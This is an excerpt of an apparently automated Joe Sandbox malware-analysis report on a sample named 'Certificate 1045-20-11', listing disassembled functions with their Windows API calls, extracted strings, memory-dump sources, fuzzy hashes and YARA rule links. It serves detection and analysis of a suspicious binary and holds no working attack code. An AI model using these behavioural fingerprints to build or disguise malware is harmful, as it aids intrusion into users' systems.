                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: 1c97aafb5a2f6fdc77a819cbc7bad0b42de62e00eaf130f7acb43fb1ccb284b8
                                                                                • Instruction ID: 3414d6aaef118a077e6262f3d2ccf8869ea1c4bff63963ebe8c1dfc0a549e806
                                                                                • Opcode Fuzzy Hash: 1c97aafb5a2f6fdc77a819cbc7bad0b42de62e00eaf130f7acb43fb1ccb284b8
                                                                                • Instruction Fuzzy Hash: 19112672524209AFEB14DFB8CC45EEA7BB8FB09344F055628F995E2250E735E850DB60
                                                                                Function 008A9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 008A9699
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008A96A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: ee1cfb92e0cb611c9edb2751358e6182dbd9462f63329279047f4f406bfd7a6c
                                                                                • Instruction ID: 467139728533f6d75f1f421f469f074e26bc7cfed4f3229f7f7a6416475e857f
                                                                                • Opcode Fuzzy Hash: ee1cfb92e0cb611c9edb2751358e6182dbd9462f63329279047f4f406bfd7a6c
                                                                                • Instruction Fuzzy Hash: 97116A71504208AAFB105F68DC44EEB3B6AFF26368F104724F9A5D75E0C7359C51A760
                                                                                Function 00885262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008852D5
                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008852F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 687bc2dbb292466f861b9f49b0286942975caaf9087150562e89abd8a54ece66
                                                                                • Instruction ID: 37825aeed2ec8faf2b6d0259fa046b06479cb7b0bfbd82839fd5d1557090a95d
                                                                                • Opcode Fuzzy Hash: 687bc2dbb292466f861b9f49b0286942975caaf9087150562e89abd8a54ece66
                                                                                • Instruction Fuzzy Hash: E511DD72901614EBDB21EAD8D944B9977B9FB06794F040125E941E72A0D7B0AE04CBA2
                                                                                Function 00894D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00894DF5
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00894E1E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 47b17ff7061ba85293527fc9cfa4eebc786a2e9b6e54c39f7a8b85403ec66588
                                                                                • Instruction ID: f211a8179a45d937925d704fcd7077965d1fdfcae527a62841519eb51aa1ba3a
                                                                                • Opcode Fuzzy Hash: 47b17ff7061ba85293527fc9cfa4eebc786a2e9b6e54c39f7a8b85403ec66588
                                                                                • Instruction Fuzzy Hash: 5211EC74101225BBDF25AF61CC88EFBFBA8FF063A4F14822AF105D6140D3709842C6E0
                                                                                Function 0089A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0089A84E
                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0089A88B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: htonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 3832099526-2422070025
                                                                                • Opcode ID: 6e429e2d801203b53a6a5a10261eb2005925a13e3192356db857bb7b049fc915
                                                                                • Instruction ID: 140cddfafecc2e09f55cddc14986387ba33fca5be4a1312104e248ca1c144328
                                                                                • Opcode Fuzzy Hash: 6e429e2d801203b53a6a5a10261eb2005925a13e3192356db857bb7b049fc915
                                                                                • Instruction Fuzzy Hash: 1E01C475200304ABCB14BF68C846FA9B364FF44314F14843AE515E7291D671E8058792
                                                                                Function 0087B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0087B7EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 39f98fa5eee436362b65daa227a1c2958476170b8ce78671fd92c2303466f334
                                                                                • Instruction ID: 480f8fc63cedad8ed4640019ea15a79d8858f4d5217d3eaaaa8df5782ab9baaf
                                                                                • Opcode Fuzzy Hash: 39f98fa5eee436362b65daa227a1c2958476170b8ce78671fd92c2303466f334
                                                                                • Instruction Fuzzy Hash: 4101F171601118ABCB44EBA8CC42EFE337EFF05354B044619F872E72D6EB7098088791
                                                                                Function 0087B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0087B6EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: a1ad9caa893104dc3a95fdcb458517ffed4b12bd2786d0953be0f3bd3539b789
                                                                                • Instruction ID: 9baaab740fa5ca0e9d03e0c65e1a8c6316fe58bb8b0e121d0e70288e755c886f
                                                                                • Opcode Fuzzy Hash: a1ad9caa893104dc3a95fdcb458517ffed4b12bd2786d0953be0f3bd3539b789
                                                                                • Instruction Fuzzy Hash: FA0184716411086BCB44EBA8C952FFE73BDFF15344B104019B606F3295DB549E1887A6
                                                                                Function 0087B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0087B76C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 95e17674aa01c0019cbb03f9b7f7b27c52f5e16bbad6bcbac89640bfc85a6d86
                                                                                • Instruction ID: e6b3563b0d909f1b2c9bdd65e6b0dada51858e9b0c4836ab1a3ac810b34fb27a
                                                                                • Opcode Fuzzy Hash: 95e17674aa01c0019cbb03f9b7f7b27c52f5e16bbad6bcbac89640bfc85a6d86
                                                                                • Instruction Fuzzy Hash: 5501A271642108ABCB44EBA8C902FFE73ADFF15344B144019B905F3296DB649E0987B6
                                                                                Function 00887744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp
                                                                                • String ID: #32770
                                                                                • API String ID: 2292705959-463685578
                                                                                • Opcode ID: b9589b654e120844144978ac7df3c4bf0b5f26d8071fa0c8b3be44a63facb077
                                                                                • Instruction ID: 03336ad2fed8b5dcb2faeff8dbcf3c18103bf755562933b74ba8be85fba0fe85
                                                                                • Opcode Fuzzy Hash: b9589b654e120844144978ac7df3c4bf0b5f26d8071fa0c8b3be44a63facb077
                                                                                • Instruction Fuzzy Hash: 2EE092776043282BDB20EAA9AC4AE9BFBACFB61760F11002AB915D3141E674E601C7D4
                                                                                Function 0087A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0087A63F
                                                                                  • Part of subcall function 008613F1: _doexit.LIBCMT ref: 008613FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Message_doexit
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 1993061046-4017498283
                                                                                • Opcode ID: dec6fa07f8fd4d425a476af9ee54d193b3a51691002b1713190ef73b5a75da1c
                                                                                • Instruction ID: 5004d57cd45a941f0461e7c17d1df2e820c165493c33ec0a5360f648c0f3bad4
                                                                                • Opcode Fuzzy Hash: dec6fa07f8fd4d425a476af9ee54d193b3a51691002b1713190ef73b5a75da1c
                                                                                • Instruction Fuzzy Hash: ECD012323C471837D21436AC6C1BF99664CFB15B66F044026BB49D67C359E7D95041DA
                                                                                Function 008BAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 008BACC0
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 008BAEBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                • String ID: WIN_XPe
                                                                                • API String ID: 510247158-3257408948
                                                                                • Opcode ID: e92f2c63afdc0a35bcfc19de582d9f0bd523c7c87cbdb697192ed4c4a197bf28
                                                                                • Instruction ID: b25d5c04141b094b254831a6d6aee75ca8ebadd85323c8eee3ac00fad6c01409
                                                                                • Opcode Fuzzy Hash: e92f2c63afdc0a35bcfc19de582d9f0bd523c7c87cbdb697192ed4c4a197bf28
                                                                                • Instruction Fuzzy Hash: 65E03970C04209AFCB25EBA8D9449ECFFB8FB48301F148092E002F2660DB305A88DF22
                                                                                Function 008A8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008A86A2
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008A86B5
                                                                                  • Part of subcall function 00887A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: c5747ecc4d5c9f62cca9dd5a0f239c72142380c7de17ceaaf91813b43bdc6292
                                                                                • Instruction ID: 859ef57b4b7896044e44f198d814e186870659f6657845972af5004217f6ce6e
                                                                                • Opcode Fuzzy Hash: c5747ecc4d5c9f62cca9dd5a0f239c72142380c7de17ceaaf91813b43bdc6292
                                                                                • Instruction Fuzzy Hash: 98D01271384368B7E26877709C4BFD6BA28FB58B11F110825B759EA2D0C9F4E940C754
                                                                                Function 008A86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008A86E2
                                                                                • PostMessageW.USER32(00000000), ref: 008A86E9
                                                                                  • Part of subcall function 00887A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: c75ed0059387f399aa242ab0b6be446c2d504ec9230e896ff934ffbacdb74c5c
                                                                                • Instruction ID: 3ae88c354620590fc84d192ae6ce85b8369389c5fc8ed947b563cdd32ee08bed
                                                                                • Opcode Fuzzy Hash: c75ed0059387f399aa242ab0b6be446c2d504ec9230e896ff934ffbacdb74c5c
                                                                                • Instruction Fuzzy Hash: AFD012713853687BF26877709C4BFC6BA28FB58B11F110825B755EA2D0C9F4E940C755